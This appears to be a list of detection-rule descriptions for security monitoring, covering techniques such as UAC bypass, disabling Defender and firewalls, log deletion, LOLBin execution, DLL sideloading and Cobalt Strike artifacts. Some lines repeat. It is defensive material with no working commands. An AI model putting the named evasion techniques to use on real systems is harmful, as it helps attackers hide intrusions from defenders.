Detects Obfuscated use of Clip.exe to execute PowerShell
Detects installed new certificate
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
Detects deletion of local audit logs
Detects the import of a alternate datastream to the registry with regedit.exe.
Detects the import of the specified file to the registry with regedit.exe.
Detects the image load of vss_ps.dll by uncommon executables using OriginalFileName datapoint
Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
Detects tools and process executions as observed in a Greenbug campaign in May 2020
Detects macOS Gatekeeper bypass via xattr utility
Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).
Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs
Detects netsh commands that turns off the Windows firewall
Detects Archer malware invocation via rundll32
Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
Detect file time attribute change to hide new or changes to existing files.
Detect file time attribute change to hide new or changes to existing files.
Detects file deletion commands
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Code integrity failures may indicate tampered executables.
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
Exports the target Registry key and hides it in the specified alternate data stream.
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Detects Execution via SyncInvoke in CL_Invocation.ps1 module
Detects Execution via SyncInvoke in CL_Invocation.ps1 module
Detects Execution via SyncInvoke in CL_Invocation.ps1 module
Checks whether the image specified in a process creation event doesn’t refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)
This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
Detects the creation of an ADS data stream that contains an executable (non-empty imphash)
Detects specific combinations of encoding methods in the PowerShell command lines
This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.
Detects suspicious empty user agent strings in proxy logs
Detects some Empire PowerShell UAC bypass methods
Detects EmpireMonkey APT reported Activity
Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution
Detects the use of the filename DumpStack.log to evade Microsoft Defender
Detects download of certain file types from hosts with dynamic DNS names (selected list)
Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)
This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
Detects Dllhost that communicates with public IP addresses
This rule detects DLL injection and execution via LOLBAS - Tracker.exe
Detects using register-cimprovider.exe to execute arbitrary dll file.
Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
Detects commands that temporarily turn off Volume Snapshots
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
Disable User Account Conrol (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
Detects disabling Windows Defender Tamper Protection
Detects disabling security tools
Detects disabling Windows Defender PUA protection
Detects command that is used to disable or delete Windows eventlog via logman Windows utility
Disable Microsoft Office Security Features by registry
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
Detects disabling Windows Defender Exploit Guard Network Protection
This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden “WindowsApps” subfolder of “C:\Program Files”. Its path includes a version number, e.g., “C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\HxTsr.exe”. Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
Detects usage of base64 utility to decode arbitrary base64-encoded text
Detects usage of base64 utility to decode arbitrary base64-encoded text
Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.
Detects uses of the createdump.exe LOLOBIN utility to dump process memory
The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
Detects suspicious command lines used in Covenant luanchers
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
Detects the creation of a named pipe as used by CobaltStrike
Detects Malleable Amazon Profile
Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
Detects a typical pattern of a CobaltStrike BOF which inject into other processes
Detects the redirection of an output stream of / within a Windows command line session
Detects clear logs
Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration
Detects remote thread creation from CACTUSTORCH as described in references.
There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC
Bypasses User Account Control using a fileless method
Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
Detects usage of bitsadmin downloading a file
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
Detects base64 encoded .NET reflective loading of Assembly
Detects base64 encoded listing Win32_Shadowcopy
Identifies when a service principal was removed in Azure.
Identifies when a service principal is created in Azure.
Identifies when a owner is was removed from a application or service principal in Azure.
Identifies when a application is deleted in Azure.
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
Attackers can use print.exe for remote file copy
Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism